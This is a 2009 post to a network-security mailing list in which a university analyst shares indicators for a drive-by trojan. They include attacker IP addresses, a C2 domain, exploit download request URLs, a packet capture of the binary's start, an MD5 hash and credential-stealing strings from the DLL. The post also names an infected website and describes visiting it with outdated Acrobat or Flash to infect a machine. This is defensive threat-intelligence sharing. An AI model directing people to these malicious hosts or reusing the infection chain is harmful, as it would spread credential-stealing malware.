[nsp-sec] wJQs.exe Trick of the Day

Brian Eckman eckman at umn.edu
Thu Apr 9 21:54:48 EDT 2009 

Quick moral of the story:
Look for the following...

  * ~ 280 KB downloads from 209.160.21.79:80/tcp
  * Steady TCP traffic to/from 209.160.21.79:443/tcp
  * DNS query for servergloria.cn


wJQs.exe, as downloaded from

GET /bb/?h=2
Host: 60.29.232.31
(via Flash exploit)

or

GET
/bb/?h=5ae0cgi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
Host: 60.29.232.31
(via PDF exploit - the h=stuff will likely be somewhat random

(SOOPER SEEKRIT HINT: the "h=" after the ? means the PDF and/or Flash
exploit *worked*, and is triggering the Trojan download. If you see URLs
like GET /bb/?t=2 or GET /bb/?t=3 or just GET /bb/?<lots of hex> ...
those are the checks leading up to the exploit code, and/or the PDF or
SWF exploit code download itself - not a sign of infection....)

Here's an example of an infected site that you can visit with a downrev
version of Acrobat Reader and/or Flash Player to infect a machine of
your choice:

MALICIOUS!!! ->  hXXp://www.thememoryhole(dot)org/   <- MALICIOUS!!!

============ WICKED DOWNLOAD TROJAN =====================
The file that was subsequently downloaded:

  * 281,600 bytes
  * From 209.160.21.79:80/tcp (and it was NOT HTTP)
  * MD5: 2f5d2ec29a8ce10544d92b269124c0da
  * http://www.virustotal.com/analisis/eee90fe77cec1ba99b654b8875836409

Infected hosts then start making very odd, consistent traffic to
209.160.21.79:443/tcp - with a *very* unusal payload. It consists of
many 0x00s, with some non-ASCII bytes tossed in every now and then.
Trust me - this isn't some wacko P2P thingy downloading movies, it's EVIL.

(Actually, a _few_ strings within in it make it look kind of like some
wacko P2P thingy distributing warez, as you'll see below, but I digress...)

Get this: Here's the start of a TCP conversation between a host infected
with wJQs.exe (above), and 209.160.21.79:80/tcp: (we'll name the
infected host "10.10.10.10")

10.10.10.10:1029 -> 209.160.21.79:80  SYN (48 bytes - no data)
209.160.21.79:80 -> 10.10.10.10:1029 SYN/ACK (48 bytes - no data)
10.10.10.10:1029 -> 209.160.21.79:80  ACK  (46 bytes - 6 data)[1]
10.10.10.10:1029 -> 209.160.21.79:80 PSH/ACK  (46 bytes - 6 data)[2]
209.160.21.79:80 -> 10.10.10.10:1029 ACK (46 bytes - 6 data)[3]
10.10.10.10:1029 -> 209.160.21.79:80 PSH/ACK  (48 bytes - 8 data)[4]
209.160.21.79:80 -> 10.10.10.10:1029 PSH/ACK (46 bytes - 6 data)[5]
209.160.21.79:80 -> 10.10.10.10:1029 PSH/ACK (1500 bytes)[6]


"Data" here simply meaning bytes after the TCP Header (displayed below
in hex)
[1]: 00 00 00 00 00 00
[2]: C8 00 00 00 00 00
[3]: 00 00 00 00 00 00
[4]: 07 46 34 35 36 37 37 33
[5]: 00 4c 04 00 00 00

[6]: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00
0010 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00
0040 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90
0050 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73
0060 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57
0070 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00
<snip>

4d 5a is MZ...  This is the first of the download of the 281,600 bytes
Trojan.

This Trojan is saved as a .DLL in C:\WINDOWS\system32\ (assuming the
user account that is logged in is an administrator). I don't have more
info right now - I'm just trying to send this off so I can go home!

------------------------------
  Fun strings inside the .dll:
------------------------------
<input type=hidden name="aslkjqwpoe123">
Login:
Password:
RunCommand
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost
SeDebugPrivilege
HTTPS
LocationURL
Screen: Full
Key Logs Data:
Name:
Key:
Computer Information: I am Installed
CPUSpeed:
Total Ram:
OS:
Computer Name:
User Name:
Protected:
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Account Manager\Accounts\POP3 Server
Account Name:
Password:
POP3 Server:
POP3 User Name:
SMTP Display Name:
SMTP Email Address:
SMTP Server:

(YOU LISTENING SALUSKY?!!??!?!)
(no, that wasn't a string in the binary. But it should have been!)


Some part of the infection caused this to happen as well:

POST /dns/in.php?i=PM4BAP6XGG40G2iHathciTH5S1480G0A90T0&o=2 HTTP/1.0
Host: servergloria.cn

I've been calling this "Zbot". I'm probably wrong, but oh well...

I guarantee you this is widespread. Oh yeah, and none of this triggered
our Snort rules.

Cheers,
Brian
-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance

More information about the nsp-security mailing list